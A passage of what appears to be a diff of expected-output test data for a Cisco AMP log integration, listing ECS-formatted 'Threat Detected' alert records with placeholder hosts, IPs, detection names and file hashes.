"process.pid": 3164, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:10.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258706469027925", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 292000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258706469028000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 220867, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ 
- "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:04.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258680699224148", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 286000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258680699224000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 222186, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:56.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": 
"test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668365670547487", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 428000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668365670547000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 223505, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:55.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - 
{ - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668361375580188", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 616000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668361375580000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 227473, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:52.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - 
"cisco.amp.detection_id": "6176258629159616595", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 649000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258629159617000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 228792, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:40.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258577620009042", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - 
"cisco.amp.timestamp_nanoseconds": 637000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258577620009000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 230111, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:28.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258526080401489", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 609000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258526080401000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, 
- "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 231430, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:16.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258474540793936", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 987000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258474540794000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": 
"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 232749, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:04.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258423001186383", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 959000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258423001186000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 234068, - "related.hash": [ - 
"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:55.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668103677542427", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 470000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668103677542000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 235387, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ 
- "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:54.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668099382575128", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 696000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668099382575000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 239357, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - 
"forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:52.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258371461578830", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 947000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258371461579000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 240676, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": 
"10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258324216938573", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 403000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258324216938000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 241995, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:29.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258272677331020", - "cisco.amp.event_type_id": 1090519054, - 
"cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 298000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258272677331000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 243314, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:17.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258221137723467", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 270000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - 
"malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258221137723000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 244633, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:05.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258169598115914", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 648000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258169598116000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": 
